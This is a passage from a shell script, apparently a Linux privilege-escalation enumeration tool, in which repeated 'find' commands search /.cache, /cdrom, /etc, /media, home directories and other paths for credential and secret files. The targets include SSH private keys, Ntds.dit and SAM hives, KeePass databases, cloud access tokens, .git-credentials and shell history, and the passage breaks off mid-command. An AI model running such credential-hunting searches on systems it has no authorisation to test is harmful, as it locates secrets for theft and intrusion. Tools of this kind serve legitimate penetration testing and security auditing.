\"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CACHE=`eval_bckgrd "find /.cache -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_CDROM=`eval_bckgrd "find /cdrom -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_ETC=`eval_bckgrd "find /etc -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*knockd*\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"ssh*config\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB=`eval_bckgrd "find /lib -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.socket\" -o -name \"*.timer\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MEDIA=`eval_bckgrd "find /media -name \"docker.sock\" -o -name \"*vnc*.txt\" -o -name \"*vnc*.xml\" -o -name \"hostapd.conf\" -o -name \"AzureRMContext.json\" -o -name \"*.pem\" -o -name \"anaconda-ks.cfg\" -o -name \"*.ovpn\" -o -name \"TokenCache.dat\" -o -name \"vault-ssh-helper.hcl\" -o -name \"ftp.config\" -o -name \"tomcat-users.xml\" -o -name \"pg_hba.conf\" -o -name \"db.php\" -o -name \"redis.conf\" -o -name \"psk.txt\" -o -name \"*.cer\" -o -name \"config.php\" -o -name \"*.jks\" -o -name \".env\" -o -name \"access_tokens.db\" -o -name \"access.log\" -o -name \"gitlab.rm\" -o -name \".msmtprc\" -o -name \"RDCMan.settings\" -o -name \"*.ftpconfig\" -o -name \"ws_ftp.ini\" -o -name \"credentials.db\" -o -name \"000-default.conf\" -o -name \"*.sqlite3\" -o -name \"ipsec.conf\" -o -name \".lesshst\" -o -name \"*.key\" -o -name \"hosts.equiv\" -o -name \"id_rsa*\" -o -name \".erlang.cookie\" -o -name \".profile\" -o -name \"unattend.inf\" -o -name \".ldaprc\" -o -name \"sentry.conf.py\" -o -name \"sysprep.xml\" -o -name \"mongod*.conf\" -o -name \"ntuser.dat\" -o -name \".bashrc\" -o -name \"gitlab.yml\" -o -name \"racoon.conf\" -o -name \"*vnc*.c*nf*\" -o -name \"drives.xml\" -o -name \"*config*.php\" -o -name \".wgetrc\" -o -name \"groups.xml\" -o -name \"postgresql.conf\" -o -name \".vault-token\" -o -name \"*.csr\" -o -name \"cesi.conf\" -o -name \".pypirc\" -o -name \"pgsql.conf\" -o -name \"id_dsa*\" -o -name \"wsl.exe\" -o -name \"backups\" -o -name \"*.der\" -o -name \"kadm5.acl\" -o -name \".github\" -o -name \"*.pgp\" -o -name \"web*.config\" -o -name \".git\" -o -name \"*.timer\" -o -name \"ddclient.conf\" -o -name \"*.crt\" -o -name \"pagefile.sys\" -o -name \"php.ini\" -o -name \"appcmd.exe\" -o -name \"recentservers.xml\" -o -name \"backup\" -o -name \"elasticsearch.y*ml\" -o -name \"Ntds.dit\" -o -name \"SAM\" -o -name \"*.keyring\" -o -name \"https.conf\" -o -name \"protecteduserkey.bin\" -o -name \"secrets.yml\" -o -name \".sudo_as_admin_successful\" -o -name \"autologin.conf\" -o -name \"known_hosts\" -o -name \"fastcgi_params\" -o -name \"setupinfo\" -o -name \"my.ini\" -o -name \"security.sav\" -o -name \"*.viminfo\" -o -name \"kcpassword\" -o -name \"KeePass.config*\" -o -name \"gvm-tools.conf\" -o -name \"ipsec.secrets\" -o -name \"*vnc*.ini\" -o -name \"autologin\" -o -name \"default.sav\" -o -name \"unattend.txt\" -o -name \"unattended.xml\" -o -name \"krb5.conf\" -o -name \"my.cnf\" -o -name \"software\" -o -name \"passwd\" -o -name \".plan\" -o -name \"system.sav\" -o -name \"legacy_credentials.db\" -o -name \"winscp.ini\" -o -name \"azureProfile.json\" -o -name \"unattend.xml\" -o -name \"snmpd.conf\" -o -name \"rsyncd.secrets\" -o -name \"*.socket\" -o -name \"*credential*\" -o -name \"*.service\" -o -name \"*.gpg\" -o -name \"wcx_ftp.ini\" -o -name \".git-credentials\" -o -name \".gitconfig\" -o -name \"https-xampp.conf\" -o -name \"*.sqlite\" -o -name \"KeePass.ini\" -o -name \"*.kdbx\" -o -name \"error.log\" -o -name \"sysprep.inf\" -o -name \"ftp.ini\" -o -name \"NetSetup.log\" -o -name \"*.swp\" -o -name \"*.pfx\" -o -name \"*.db\" -o -name \"docker-compose.yml\" -o -name \"bash.exe\" -o -name \"KeePass.enforced*\" -o -name \"authorized_hosts\" -o -name \"ConsoleHost_history.txt\" -o -name \"AppEvent.Evt\" -o -name \"credentials\" -o -name \"scclient.exe\" -o -name \"ffftp.ini\" -o -name \".google_authenticator\" -o -name \"supervisord.conf\" -o -name \"passbolt.php\" -o -name \"accessTokens.json\" -o -name \"sitemanager.xml\" -o -name \"Dockerfile\" -o -name \"server.xml\" -o -name \"pgadmin*.db\" -o -name \"mariadb.cnf\" -o -name \"access_tokens.json\" -o -name \".htpasswd\" -o -name \"FreeSSHDservice.ini\" -o -name \"SecEvent.Evt\" -o -name \"rsyncd.conf\" -o -name \"filezilla.xml\" -o -name \"debian.cnf\" -o -name \"printers.xml\" -o -name \"database.php\" -o -name \"*password*\" -o -name \"sites.ini\" -o -name \"creds*\" -o -name \"docker.socket\" -o -name \".recently-used.xbel\" -o -name \"storage.php\" -o -name \"authorized_keys\" -o -name \"mosquitto.conf\" -o -name \"index.dat\" -o -name \"*.keystore\" -o -name \"iis6.log\" -o -name \"*.rdg\" -o -name \"*.p12\" -o -name \".rhosts\" -o -name \"wp-config.php\" -o -name \"cloud.cfg\" -o -name \"httpd.conf\" -o -name \"scheduledtasks.xml\" -o -name \"datasources.xml\" -o -name \".*_history.*\" -o -name \"settings.php\" -o -name \"krb5.keytab\" -o -name \".k5login\" -o -name \"kibana.y*ml\" -o -name \"*.gnupg\" -o -name \"setupinfo.bak\" -o -name \"software.sav\" -o -name \"SYSTEM\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_MNT=`eval_bckgrd "find /mnt -name \"docker.sock\" -o -name 